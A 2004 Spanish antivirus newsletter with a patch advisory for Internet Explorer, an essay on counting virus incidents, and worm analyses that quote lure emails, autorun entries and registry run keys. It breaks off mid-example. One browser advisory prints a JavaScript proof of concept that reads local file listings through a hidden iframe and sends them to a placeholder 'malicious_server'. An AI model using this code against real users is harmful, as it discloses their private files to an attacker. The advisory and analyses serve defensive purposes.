Inicio > Mis eListas > vsantivirus > Mensajes
 Índice de Mensajes 
 Mensajes 657 al 676 
AsuntoAutor
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
VSantivirus No. 16 VSAntivi
 << 20 ant. | 20 sig. >>
 
VSAntivirus
Página principal    Mensajes | Enviar Mensaje | Ficheros | Datos | Encuestas | Eventos | Mis Preferencias

Mostrando mensaje 658     < Anterior | Siguiente >
Responder a este mensaje
Asunto: VSantivirus No. 1609 Año 8, jueves 2 de diciembre de 2004
Fecha:Jueves, 2 de Diciembre, 2004  02:00:26 (-0200)
Autor:VSAntivirus.com <vsantivirus @...........com>


VSantivirus No. 1609 Año 8, jueves 2 de diciembre de 2004
_____________________________________________________________

El boletín diario de VSANTIVIRUS - http://www.vsantivirus.com
VIDEO SOFT (Maldonado, Uruguay) - http://www.videosoft.net.uy
_____________________________________________________________

1 - MS04-040 Actualización acumulativa para IE (889293)
2 - Cuantificación de incidencias víricas (F. de la Cuadra)
3 - Revelación de información en Mozilla, Firefox y Opera
4 - W32/Salga.A. Los mensajes mencionan a Britney Spears
5 - W32/Wurmark.A. Datos adjuntos: ATTACHED.ZIP
6 - W32/Wurmark.B. Datos adjuntos: ATTACHED.ZIP
_____________________________________________________________

1 - MS04-040 Actualización acumulativa para IE (889293)
_____________________________________________________________

http://www.vsantivirus.com/vulms04-040.htm

MS04-040 Actualización acumulativa para IE (889293)

Por Redacción VSAntivirus
vsantivirus@videosoft.net.uy

Se ha detectado un problema de seguridad que podría permitir a
un usuario malintencionado poner en peligro un equipo que
ejecute Internet Explorer y hacerse con el control del mismo.
Puede mejorar la protección del equipo con esta actualización
de Microsoft.

* Nivel de gravedad: Crítico
* Impacto: Ejecución remota de código
* Fecha de publicación: 1 de diciembre de 2004

* Reemplaza:

Esta revisión reemplaza a la proporcionada por el boletín de
seguridad MS04-038 solo para Internet Explorer 6 Service Pack
1 e Internet Explorer 6 para Windows XP Service Pack 1 (64-Bit
Edition). Otras versiones:

MS04-038 Actualización acumulativa para IE (834707)
http://www.vsantivirus.com/vulms04-038.htm

* Software afectado:

- Microsoft Windows NT Server 4.0 Service Pack 6a
- Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
- Microsoft Windows 2000 Service Pack 3
- Microsoft Windows 2000 Service Pack 4
- Microsoft Windows XP Service Pack 1
- Microsoft Windows XP 64-Bit Edition Service Pack 1
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition (SE)
- Microsoft Windows Millennium Edition (Me)

* Componentes afectados:

- Internet Explorer 6 SP1 (Windows 2000 SP3)
- Internet Explorer 6 SP1 (Windows 2000 SP4)
- Internet Explorer 6 SP1 (Windows XP SP1)
- Internet Explorer 6 SP1 (NT 4.0 SP6a)
- Internet Explorer 6 SP1 (NT 4.0 Terminal Service SP6)
- Internet Explorer 6 SP1 (Windows 98)
- Internet Explorer 6 SP1 (Windows 98 SE)
- Internet Explorer 6 SP1 (Windows Me)
- Internet Explorer 6 (Windows XP SP1 64-Bit Edition)

Estas versiones fueron testeadas y son vulnerables. Otras
versiones anteriores no mencionadas, podrían o no ser
vulnerables, pero ya no son soportadas por Microsoft.

* Software NO afectado:

- Microsoft Windows XP Service Pack 2
- Microsoft Windows XP 64-Bit Edition Version 2003
- Microsoft Windows Server 2003
- Microsoft Windows Server 2003 64-Bit Edition

* Descripción

Esta actualización resuelve una nueva vulnerabilidad de
Internet Explorer, reportada públicamente.

Dicha vulnerabilidad puede permitir la ejecución remota de
código en los sistemas afectados.

Si el usuario actual tiene privilegios administrativos, el
atacante podrá tomar el control total del sistema afectado,
incluyendo la instalación de programas; visualizar, cambiar o
borrar información; o crear nuevas cuentas con todos los
privilegios. Si el usuario actual no posee esos privilegios,
el atacante también verá restringidas sus acciones.

Un atacante puede aprovecharse de esta vulnerabilidad,
construyendo una página Web maliciosa, y persuadiendo de algún
modo al usuario para visitarla, típicamente mediante un enlace
en algún correo no solicitado, etc.

Por defecto, Outlook Express 6, Outlook 2002, y Outlook 2003
abren el correo electrónico en la zona de sitios restringidos,
lo que ayuda a reducir la consecuencia de los ataques que
puedan producirse si se intenta explotar esta vulnerabilidad a
través de mensajes con formato HTML.

Adicionalmente, Outlook 98 y Outlook 2000 los abren también en
dicha zona, si se ha instalado la actualización de seguridad
para Outlook.

Outlook Express 5.5 Service Pack 2 abre correo HTML en la zona
restringida si el parche reportado en el boletín MS04-018 ha
siso instalado.

Internet Explorer 6 incluido en Windows XP Service Pack 2, no
es afectado por este problema.

La vulnerabilidad es provocada por un desbordamiento de búfer
al procesar elementos FRAME e IFRAME.

IFRAME (Inline Floating Frames) es una tecnología que permite
a los creadores de sitios Web, incrementar el control sobre el
diseño y la interacción entre sus páginas.

Esta actualización remueve la vulnerabilidad modificando el
modo en que el Internet Explorer valida el largo de los
mensajes cuando se procesan elementos HTML.

La vulnerabilidad ahora corregida, está explicada en el
siguiente enlace:

Vulnerabilidad en IFRAME permite ataque remoto en IE
http://www.vsantivirus.com/vul-ie-iframe-2810004.htm

* Descargas:

Las actualizaciones pueden descargarse de los siguientes
enlaces:

[Nota: los enlaces aparecen cortados por superar la cantidad
de caracteres permitidos en el formato de este boletín. En
todos los casos se deben cortar y pegar en una sola línea]

* Actualización de seguridad acumulativa para Internet
Explorer 6 Service Pack 1 - Windows XP, Windows 2000
(KB889293)

http://www.microsoft.com/downloads/details.aspx?familyid=3A9DB
D51-4348-4EE6-9BC1-D9A1E12963EC&displaylang=es

Sistemas operativos compatibles:

- Windows 2000 Service Pack 3
- Windows 2000 Service Pack 4
- Windows XP, Windows XP Service Pack 1

Esta actualización se aplica a Internet Explorer 6 Service
Pack 1 (SP1) con los siguientes sistemas operativos:

- Windows XP SP1
- Windows XP
- Windows 2000 SP3
- Windows 2000 SP4

* Actualización de seguridad acumulativa para Internet
Explorer 6 Service Pack 1 - Windows 98, Windows Millennium,
Windows NT4 (KB889293)

http://www.microsoft.com/downloads/details.aspx?familyid=96DE6
C13-4F67-4581-8F51-2C8A90E11C57&displaylang=es

Sistemas operativos compatibles:

- Windows 98
- Windows 98 Second Edition
- Windows ME, Windows NT

Esta actualización se aplica a Internet Explorer 6 Service
Pack 1 (SP1) con los siguientes sistemas operativos:

- Windows 98
- Windows 98SE
- Windows NT4 Server
- Windows Millennium

Descarga para otros productos:
www.microsoft.com/technet/security/bulletin/ms04-040.mspx


* Nota:

Antes de instalar esta actualización, por favor verifique que
el software que se menciona tenga instalado los Service Pack a
los que se hace referencia. En caso contrario la aplicación
puede fallar o ejecutarse de manera incorrecta.


* Más información:

Microsoft Security Bulletin MS04-040
www.microsoft.com/technet/security/bulletin/ms04-040.mspx

Microsoft Knowledge Base Article - 889293
http://support.microsoft.com/?kbid=889293


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________

2 - Cuantificación de incidencias víricas (F. de la Cuadra)
_____________________________________________________________

http://www.vsantivirus.com/fdc-incidencias.htm

Cuantificación de incidencias víricas

Por Fernando de la Cuadra (*)
Fdelacuadra@pandasoftware.com

Una de los datos más solicitados a las empresas antivirus de
todo el mundo es el nivel de incidencias que produce un
determinado virus, más aún cuando el virus es catalogado como
peligroso o de riesgo.

La extrapolación basándose en una determinada muestra puede
ser estadísticamente correcta, pero dentro del margen de error
que se suele admitir (incluso operando con sigma 3 o
superior), puede haber una cantidad ingente de equipos
infectados por un virus, o unas pérdidas económicas
silenciadas por muy diversos motivos.

A la hora de interpretar los datos hay que tener en cuenta la
diversa condición de cada incidencia. Muchos fabricantes
antivirus diseñan sistemas de detección genéricos para
determinados virus, lo que hace que los resultados de
detección de toda una familia de virus sean contabilizados
como los de un solo ejemplar para unas empresas. Realizando
así la detección, los datos de incidencias de un miembro único
de la familia resultan distorsionados por los demás y
viceversa.

Otro factor que no hay que olvidar es el número de sistemas de
detección instalados que reportan al fabricante. Si se dispone
de un elevado parque de instalaciones en ordenadores
domésticos que no efectúan ninguna conexión con los sistemas
centrales, es imposible obtener cifras reales en el sector
doméstico y en la pyme.

Por lo que respecta a grandes empresas, el problema se vuelve
aún mayor. Si el sistema de notificación de incidencias
únicamente refleja una incidencia por cliente, los datos se
vuelven realmente inútiles, ya que en la gran empresa el
parque de ordenadores puede ser realmente grande, incluso de
cientos de miles de equipos. En estas empresas la notificación
de incidencias pasa por varios obstáculos:

- Los departamentos de sistemas suelen tener tanto personal
como sistemas perfectamente preparados para luchar contra un
virus o una intrusión, por lo que generalmente se vuelven
autosuficientes a la hora de luchar contra los códigos
maliciosos y no suelen reportar a sus proveedores de seguridad
informática.

- Dentro del personal de seguridad suele haber personal
externo contratado directamente a las empresas de seguridad.
De esta manera, la incidencia se puede resolver mucho antes y
sin necesidad de que el fabricante del antivirus tenga
noticias de la incidencia, que antes podía recibirla quizá en
informes semanales o mensuales.

- En caso de que una incidencia grave se produzca y sea
necesario la intervención de proveedor, los contratos de
confidencialidad que unen a los fabricantes con los clientes
suelen exigir una absoluta discreción a la hora de manejar
este tipo de información.

Con estos condicionantes, cualquier cifra ofrecida, siquiera
aproximada, del número de sistemas afectados queda realmente
desvirtuada.

Por otro lado, es muy complicado determinar exactamente el
nivel de daño que está ocasionando un determinado código
malicioso. Cuando un cliente llama a su proveedor de antivirus
para comunicar una incidencia, lo primero que hay que
determinar es el tipo de incidencia que ocasiona la llamada.
Se pueden establecer tres distintos tipos de llamada:

- Informativa. Es el caso del cliente que, sin haber sufrido
todavía el ataque, solicita información acerca del código
malicioso en cuestión o instrucciones adicionales para
defenderse. Esta llamada no puede clasificarse como
incidencia, ya que el virus todavía no ha hecho acto de
presencia en los sistemas del cliente que llama, aunque ya ha
producido preocupación.

- Encuentro. Técnicamente, se denomina "encuentro con un
virus" a la situación en la que uno o más ordenadores han
recibido un código maligno, pero no ha llegado a producir
ningún daño. Puede deberse a que el sistema de protección
preventiva ha detenido la amenaza antes de que se active, o
bien porque los servidores de la empresa lo han filtrado
adecuadamente.

- Infección. Este es el primer nivel en el que se puede
considerar que los problemas existen. El código malicioso ha
conseguido saltarse las barreras de protección (si existieran)
y ha lanzado su rutina de destrucción. Aquí hay que volver a
distinguir en la manera en la que se contabilizan las
infecciones, ya que no es lo mismo un ordenador infectado que
toda una red infectada.

* Infección moderada. Diversas referencias la denominan
"infección leve", aunque nunca una infección vírica puede
considerarse leve. En este caso solamente un reducido número
de ordenadores (inferior al 15%) han sufrido una infección.

* Infección masiva, cuando numerosos ordenadores de la empresa
(entre un 15 y un 30%) han recibido el código malicioso y
sufren sus consecuencias.

* Catástrofe, infección de ordenadores en la empresa en la que
el los equipos afectados se sitúan entre el 30 y el 50%.

* Colapso total, cuando más del 50% de los equipos de la red
se encuentran detenidos o afectados por un virus.

Tratándose de equipos domésticos o de pymes en las que
solamente hay un ordenador, cualquier infección puede
englobarse dentro de esta categoría, ya que, en realidad, el
100% de los sistemas (es decir, uno) se encuentra infectado.

Teniendo en cuenta todas estas consideraciones, podemos
deducir que cualquier cifra de ordenadores infectados debe ser
siempre tomada con mucha precaución. Generalmente, el impacto
de un virus debe ser cuantificado mediante otros métodos
indirectos, ya que cualquier injerencia en la medida supone ya
de por sí desvirtuarla. Es decir, si medimos la incidencia de
un virus con un antivirus que lo elimina, desvirtuamos la
expansión real y, por tanto, los datos que buscamos.


(*) Fernando de la Cuadra es Editor Técnico Internacional de
Panda Software (http://www.pandasoftware.com)


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________

3 - Revelación de información en Mozilla, Firefox y Opera
_____________________________________________________________

http://www.vsantivirus.com/vul-011204.htm

Revelación de información en Mozilla, Firefox y Opera

Por Angela Ruiz
angela@videosoft.net.uy

Existe un problema en algunos navegadores, en donde un FRAME
puede obtener acceso a los atributos de otro FRAME (o IFRAME).

Esto ha sido comprobado en Mozilla, Firefox y Opera. Microsoft
Internet Explorer no es afectado por esta debilidad.

La explotación de este fallo, podría revelar información local
a un atacante.

Se ha publicado la siguiente prueba de concepto (PoC):

  <html>
  <body onLoad="

    list_files='';
    for(i=0;i<local_files.document.links.length;i++)
           {list_files+=local_files.document.links.item(i);}
    alert(list_files);
    //send list_files at malicious_server

    document.location.href=
    'http://malicious_server/grab.php?list='+list_files;

              ">
  <iframe name="local_files" src="file:///home/" height=0
  width=0></iframe>

  </body>
  </html>

Un servidor malicioso puede obtener el contenido del
directorio "/home/" (o "c:\Document and Setting\" en sistemas
Windows), y de ese modo tener conocimiento de una serie de
archivos de usuario presentes en el sistema.

También podría ser posible conocer si un determinado programa
se encuentra en el equipo afectado, con la intención de sacar
provecho de ello en un posterior ataque.

De todos modos, esto no puede ser explotado en forma directa
por un sitio Web malicioso, ya que la página es abierta desde
un camino local (file :/ /localpath/code.htm, donde code.htm
es el ejemplo anterior), desde que el iframe "local_files"
pertenece a un dominio local.

Con Internet Explorer este código no funciona a nivel local.

Para que un atacante saque provecho de esto, debe hacer que el
usuario abra http :/ /maliciuos_server/code.htm,  y que el
servidor malicioso responda con una página conteniendo un
campo "Content-Type" desconocido (por ejemplo "text/html." con
un punto al final), para que el navegador muestre una ventana
de diálogo con algunas opciones (Abrir, Guardar, Cancelar).

Seleccionando "Abrir" para ver la página, esta será descargada
y abierta desde una ubicación local, permitiendo que el código
en JavaScript se ejecute en un contexto local (lo mismo
ocurrirá si selecciona "Guardar" y luego abre la página).

En Opera, para que funcione este método de explotación remota,
debe estar configurado como aplicación por defecto para abrir
y guardar archivos.

No existe solución al momento actual, de parte de los
vendedores involucrados, quienes han sido avisados el 24 de
noviembre pasado, según el autor de este descubrimiento.

Son afectados los siguientes productos:

- Firefox 1.0 (y anteriores)
- Mozilla 1.7 (y anteriores)
- Opera 7.54 (y anteriores)


* Créditos:

Giovanni Delvecchio


* Referencias:

Disclosure of file system information in
Mozilla Firefox and Opera Browser
http://www.securityfocus.com/archive/1/382855


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________

4 - W32/Salga.A. Los mensajes mencionan a Britney Spears
_____________________________________________________________

http://www.vsantivirus.com/salga-a.htm

Nombre: W32/Salga.A
Nombre NOD32: Win32/Salga.A
Tipo: Gusano de Internet
Alias: Salga, Win32/Salga.A, W32.Salga.A@mm
Fecha: 29/nov/04
Plataforma: Windows 32-bit
Tamaño: variable

Gusano escrito en Microsoft Visual Basic, que se envía en
forma masiva por correo electrónico a todos los contactos de
la libreta de direcciones de Windows y de archivos del sistema
infectado, utilizando el Microsoft Outlook (y Outlook
Express), en mensajes como los siguientes:

Ejemplo 1:

Asunto: Nicole kidman secrets
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  Hi,this is secret files of <<Nicole Kidman>> contain
  her sexy photoes in Florida,her credits ,part of her
  new film {Bn-laden days} and her telephones numers
  with here email.....see it and replay us please .....
  it is very interesting secret files ..bibi

Ejemplo 2:

Asunto: BRITNY SPEARS MARRAGE
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  Hi,this is secret files of <<Britny spears>> contain
  her marrage photoes in texas,part of her marrage party
  and her reactions about madona.....see it and replay
  us please ..... it is very interesting secret files
  ..bibi

Ejemplo 3:

Asunto: Is Bnladen realy cow boy
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  Hi: mr or miss some amricans say befor 20 yrs Bnladen
  was cow boy these photoes and parts of vidioes prove
  it <<photos and vedioes in attachement file>>

Ejemplo 4:

Asunto: Chance for holyday
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  If u you want to have anice holyday you must call us
  at this adress USA MITCHGEN and we will give greate
  offer details in this attachment

Ejemplo 5:

Asunto: To contact new friends
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  Hi:miss or mr you can contact new friends all ever the
  world deatails in attachmment file

Ejemplo 6:

Asunto: New version of kasper fire wall
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  this is the new update and last version of kasper fire
  wall it contains more and new advantages

Ejemplo 7:

Asunto: SEXY FILES
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  This attachmment contain very hard sexy photos with
  part of sexy films interest and replay us

Ejemplo 8:

Asunto: BRITNY SPEARS MARRAGE
Datos adjuntos: Britny spears marrage with Bnladensun.zip
Texto del mensaje:

  Hi;this is some photoes of Britney Spears marrage with
  Bnladen son in flash file so<<<<if the winzip file not
  run you must change the extention to exe to execute it

Intenta propagarse además, a través del mIRC, redes de
archivos compartidos (P2P), y también a través de recursos
compartidos de redes.

El envío masivo de los mensajes, causa una notoria degradación
del rendimiento de la conexión a Internet.

Cuando se ejecuta, se copia con los siguientes nombres (o en
las carpetas que existan, si corresponde):

  .exe
  C:\Britny spears marrage with Bnladensun.zip
  C:\Documents and Settings\All Users\DESKTOP\holywood stuff
film.zip.exe
  C:\Documents and Settings\All Users\Start Menu\nicole kidman
sexy cam.zip.exe
  C:\Documents and Settings\All Users\Start
Menu\Programs\Accessories\magic graphices maker.zip.exe
  C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\egy~1
  C:\Documents and Settings\All Users\Start Menu\Programs\your
sexy cam.zip.exe
  C:\Program Files\Accessories\BRITNY SPEARS
MARRAGE.zip...............exe
  C:\Program Files\Accessories\Details of new
friends.zip...............exe
  C:\Program Files\Accessories\Details.zip...............exe
  C:\Program Files\Accessories\hard sex
files.zip...............exe
  C:\Program Files\Accessories\Is Bnladen realy cow
boy.zip...............exe
  C:\Program
Files\Accessories\kasper2005.zip...............exe
  C:\Program Files\Accessories\Nicole
Kidman.zip...............exe
  C:\program files\mirc\Britny spears marriage with Bnladen
son.zip.exe
  C:\program files\mirc32\Britny spears marriage with Bnladen
son.zip.exe
  c:\windows\acdsee demo.exe
  c:\windows\All Users\Start Menu\Programs\StartUp\ana~1.exe
  c:\windows\Start Menu\inter net speeder.zip.exe
  c:\windows\start menu\programs\new chat prog.zip.exe
  c:\windows\system\system copy.exe
  c:\windows\system32\egywormo[gen1].exe

Genera las siguientes entradas en el registro, para
autoejecutarse en cada reinicio del sistema:

  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  system xp = c:\windows\acdsee demo.exe

  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  windows = c:\windows\system\system copy.exe

Intenta sobrescribir los siguientes archivos:

  C:\program files\mIRC\script.ini
  C:\program files\mIRC32\script.ini

Con ello, utilizará el mIRC para enviar el siguiente archivo
(una copia de si mismo), a usuarios conectados a los mismos
canales de chat que visite el usuario infectado:

  Britny spears marriage with Bnladen son.zip.exe

También crea las siguientes carpetas:

  C:\Britny
  C:\hard core hook from web
  c:\windows\All Users\Desktop\sex cam
  D:\hook all sex movies from webs
  D:\new computer worm alert
  D:\NEW PROGRAMS
  E:\real sex telephones

Y se copia con los siguientes nombres en dichas carpetas:

  C:\Britny\NEW FILM.ZIP.EXE
  C:\hard core hook from web\setup.zip.exe
  c:\windows\All Users\Desktop\sex cam\sex photoes of
monika.zip.exe
  D:\FUN.ZIP.EXE
  D:\girlfriends emails.zip.exe
  D:\hook all sex movies from webs\setup.zip.exe
  E:\blood of fetch sex.zip.exe
  E:\Messenger 9.00.ZIP.EXE
  E:\real sex telephones\me.zip.exe

Crea un archivo AUTORUN.INF en el raíz de la unidad D: (si
existe y no es un CD), conteniendo las siguientes líneas:

  [autorun]
  open=FUN.ZIP.EXE

Crea un archivo AUTORUN.INF en el raíz de la unidad E: (si
existe y no es un CD), conteniendo las siguientes líneas:

  [autorun]
  open=Messenger 9.00.ZIP.EXE

Si no existem crea la siguiente carpeta:

  C:\Program Files\Kazaa\My Shared Folder\Shared

Se copia en ella con los siguientes nombres de archivo:

  [SWF] - Harry Potter and the philosophers
stone.zip.........exe
  [SWF] - Swordfish.........exe
  [SWF] - The Fast and the Furious.zip.........exe
  3d msn version 10.1.zip................exe
  3dstoudio.zip.........exe
  animal photos.zip.........exe
  anti virus.zip.........exe
  antibiotics.zip.........exe
  aol.zip.........exe
  autocade.zip.........exe
  big one in the world.zip.........exe
  Britny Spears.zip.........exe
  Cat attacks child.zip.........exe
  cocacola.zip.........exe
  Comedy video.zip.........exe
  computers in 2010.zip.........exe
  deutsh programs.zip.........exe
  Dracola.zip.........exe
  FBI secrets.zip.........exe
  fear.zip.........exe
  fire wall.zip.........exe
  FlashMovie.zip.........exe
  FOOTBALL IN ENGLAND.zip.........exe
  Game_Crack_Genie_v0.5.zip.........exe
  hack.zip.........exe
  hard core.zip.........exe
  huge sexy brests program v 1.7.00.zip.exe
  i robot.zip.........exe
  lesbien.zip.........exe
  MacroMedia Flash 6.0.zip.........exe
  mirc.zip.........exe
  ms games.zip.........exe
  MsDos_PortScanner.zip.........exe
  new film.zip.........exe
  news paper.zip.........exe
  news.zip.........exe
  norton 2005.zip.........exe
  office 2005.zip.........exe
  pebsi.zip.........exe
  photo shop.zip.........exe
  scince of water.zip.........exe
  sex plus.zip.........exe
  Shockwave Flash.zip.........exe
  Simpsons Episode (#36)..zip.........exe
  songs.zip.........exe
  ssPamela_Anderson_(Naked Screen Saver).scr.........exe
  ssParis_Hilton_(Nude Screen Saver).scr.............exe
  SWF.zip.........exe
  SWF_Movie.zip.........exe
  this files is very secret files.zip.........exe
  tourism.zip.........exe
  TOY 2006.zip.........exe
  Tutorial Video on Hacking.........exe
  USA secrets.zip.........exe
  viagra.zip.........exe
  Virtual_3D_Pinball.zip.........exe
  virus.zip.........exe
  visual basic projects.zip.........exe
  Win32System_Tweaks_v1.0.zip.........exe
  Wmplayer_Celebrity_Skins.zip.........exe
  wwf.zip.........exe
  xxl plus.zip.........exe
  XXX video.zip.........exe
  yahoo.zip.........exe

También crea la siguiente entrada en el registro, para
compartir dicha carpeta al iniciarse el KaZaa:

  HKCU\Software\Kazaa\Transfer\StartKazaa
  -SilentRun = C:\Program Files\Kazaa\My Shared Folder\Shared

Busca todas las carpetas que en su nombre contengan la cadena
"SHAR", y se copia con los siguientes nombres en ellas:

  Britny spears and Madona sex viedio in 24 min
only.zip.................exe
  Iraq war.zip.................exe
  last messengers versions.zip.................exe
  learn photo shop in 3 days only.zip.................exe
  new cupied photos.zip.................exe
  new girls emails with there phone
numbers.zip.................exe
  strong fire wall allover the world with thelast update of
norton.zip.................exe
  USA discvered water in mars
yesterday.doc.zip.................exe

También busca los recursos compartidos C$, IPC$ y ADMIN$, e
intenta copiarse en ellos con los siguientes nombres:

  admin$\system32\see this it is very
intersting.zip...................................exe
  c$\documment and settings\all users\documents\secret
documents.zip......................exe
  c$\money generator very dengerous and
secrt.zip..........................exe
  c$\shared\my sallary every mmonth
increaser.................................exe
  c$\windows\system32\pass word of hotmail
store.zip................exe
  c$\winnt\systemm32\speial films links in
net.zip.............................exe
  ipc$\secret photoes from my
chat.zip...............................exe

Crea una carpeta de red compartida con el nombre de "Britny",
y la mapea con el siguiente nombre:

  C:\Britny

Envía el siguiente mensaje a otros usuarios:

  Message from [nombre equipo infectado] to [workgroup]
  on [fecha]:

  * hi welcome in our network you can see the new film
  of Britny spears from the computer which shown it is
  very interesting film or see it also from any shared
  folder <<habby interesting time in our net cafe bi>>

Abre una ventana del navegador, apuntando al siguiente
dominio:

  originalicons .com

Dentro de la carpeta creada antes, crea el siguiente archivo:

  D:\new computer worm alert\virus alert.txt

VIRUS ALERT.TXT contiene el siguiente texto:

  your computer have been infected by:-
  Egywormo[gen1]
  this worm may lead to increase hard disk space,slow
  your system and also can destroy your c:\ drive
  aim of this worm is catching more victems and give
  them ip and some email details then destroy hard space
  with system exclusion
  creation by XP10 VIRUS MASTER
  contact us in <mgasalgya_4ever @ hotmail.com>

Utiliza el Microsoft Outlook y Outlook Express para enviar
mensajes al autor, con las siguientes características:

Mensaje 1:

Para: mgasalgya_4ever @ hotmail.com
Asunto: Sir new victem

Texto del mensaje:

  Hi:sir i'm your server Egywormo[gen1] this is new
  victem who has own outlook machine i caputre his
  contacts and go there to infect them.... ok i'll go now
  and see you soon when i infect more ......bibi sir


Mensaje 2:

Para: mgasalgya_4ever @ hotmail.com
Asunto: Egywormo give her sir email of victem

Texto del mensaje:

  password of victem email

NOTA: "c:\windows\system32" puede variar de acuerdo al sistema
operativo instalado (con ese nombre por defecto en Windows XP
y Windows Server 2003, como "c:\winnt\system32" en Windows NT
y 2000 y "c:\windows\system" en Windows 9x y ME).


* Reparación manual

* Deshabilitar cualquier conexión a Internet o una red

Es importante desconectar cada computadora de cualquier
conexión a Internet, o red local, antes de proceder a su
limpieza.


* Antivirus

Actualice sus antivirus con las últimas definiciones, luego
siga estos pasos:

1. Reinicie Windows en modo a prueba de fallos, como se indica
en este artículo:

  Cómo iniciar su computadora en Modo a prueba de fallos.
  http://www.vsantivirus.com/faq-modo-fallo.htm

2. Ejecute sus antivirus en modo escaneo, revisando todos sus
discos duros.

3. Borre los archivos detectados como infectados.


* Editar el registro

Nota: algunas de las ramas en el registro aquí mencionadas,
pueden no estar presentes ya que ello depende de que versión
de Windows se tenga instalada.

1. Ejecute el editor de registro: Inicio, ejecutar, escriba
REGEDIT y pulse ENTER

2. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_CURRENT_USER
  \Software
  \Kazaa
  \Transfer
  \StartKazaa

3. Haga clic en la carpeta "StartKazaa" y en el panel de la
derecha, bajo la columna "Nombre", busque y borre la siguiente
entrada:

  -SilentRun = C:\Program Files\Kazaa\My Shared Folder\Shared

4. En el panel izquierdo del editor, haga clic en el signo "+"
hasta abrir la siguiente rama:

  HKEY_LOCAL_MACHINE
  \SOFTWARE
  \Microsoft
  \Windows
  \CurrentVersion
  \Run

5. Haga clic en la carpeta "Run" y en el panel de la derecha,
bajo la columna "Nombre", busque y borre las entradas que
aparezcan de esta lista:

  system xp
  windows

6. Use "Registro", "Salir" para salir del editor y confirmar
los cambios.

7. Reinicie su computadora (Inicio, Apagar el sistema,
Reiniciar).


* Información adicional

* Mostrar las extensiones verdaderas de los archivos

Para poder ver las extensiones verdaderas de los archivos y
además visualizar aquellos con atributos de "Oculto", proceda
así:

1. Ejecute el Explorador de Windows

2. Seleccione el menú 'Ver' (Windows 95/98/NT) o el menú
'Herramientas' (Windows Me/2000/XP), y haga clic en 'Opciones'
u 'Opciones de carpetas'.

3. Seleccione la lengüeta 'Ver'.

4. DESMARQUE la opción "Ocultar extensiones para los tipos de
archivos conocidos" o similar.

5. En Windows 95/NT, MARQUE la opción "Mostrar todos los
archivos y carpetas ocultos" o similar.

En Windows 98, bajo 'Archivos ocultos', MARQUE 'Mostrar todos
los archivos'.

En Windows Me/2000/XP, en 'Archivos y carpetas ocultos',
MARQUE 'Mostrar todos los archivos y carpetas ocultos' y
DESMARQUE 'Ocultar archivos protegidos del sistema operativo'.

6. Haga clic en 'Aplicar' y en 'Aceptar'.


* Limpieza de virus en Windows Me y XP

Si el sistema operativo instalado es Windows Me o Windows XP,
para poder eliminar correctamente este virus de su
computadora, deberá deshabilitar antes de cualquier acción, la
herramienta "Restaurar sistema" como se indica en estos
artículos:

Limpieza de virus en Windows Me
http://www.vsantivirus.com/faq-winme.htm

Limpieza de virus en Windows XP
http://www.vsantivirus.com/faq-winxp.htm


(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
_____________________________________________________________

5 - W32/Wurmark.A. Datos adjuntos: ATTACHED.ZIP
_____________________________________________________________

http://www.vsantivirus.com/wurmark-a.htm

Nombre: W32/Wurmark.A
Nombre NOD32: Win32/Wurmark.A
Tipo: Gusano de Internet y caballo de Troya
Alias: Wurmark, Mugly, Email-Worm.Win32.Wurmark.a,
I-Worm/Wurmark.B, Trojan.Gadgo.20, W32/Mugly.A.worm,
W32/Mugly.a@MM, W32/Mugly.B.worm, W32/Mugly.b@MM,
W32/Wurmark-A, Win32/Mugly.A, Win32/Wurmark.A,
Worm.Win32.Wurmark.a, Worm/Wurmark.a.1, WORM_MUGLY.A,
Win32/Rbot.BPH
Fecha: 29/nov/04
Plataforma: Windows 32-bit
Tamaño: 423,443 bytes

Se han detectado al menos dos variantes de este gusano, que se
propaga en mensajes con las siguientes características:

De: [remitente falso]

Asunto: [uno de los siguientes]

  You have an Admirer
  Your Pic On A Website!!
  Rate My Pic.......
  Hhahahah lol!!!!

Texto del mensaje: [uno de los siguientes]

Ejemplo 1:

  Someone has asked us on there behalf to send
  you this email and tell you they think you are
  wonderfull!!! All the The mystery persons details
  you need are enclosed in the attachment :)
  please download and respond telling us if you
  would like to make further contact with this
  person.

  Regards Hallmark Admirer Mail Admin.

  ------------------------------------------------------
  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed Version

Ejemplo 2:

  I was looking at a website and came across
  this pic they look just like you! infact im sure
  it is lol , did you send this pic into them ? or
  is it someonce else :S ? Ive Added the pic in
  a zip so download it and check & email me back!


  ------------------------------------------------------

  Current email was sent by an Evaluation License.
  Note: This footer will be removed with Licensed
  Version

Ejemplo 3:

  Hi ive sent 5 emails now and nobody will rate
  my pic!! :( please download and tell me what you
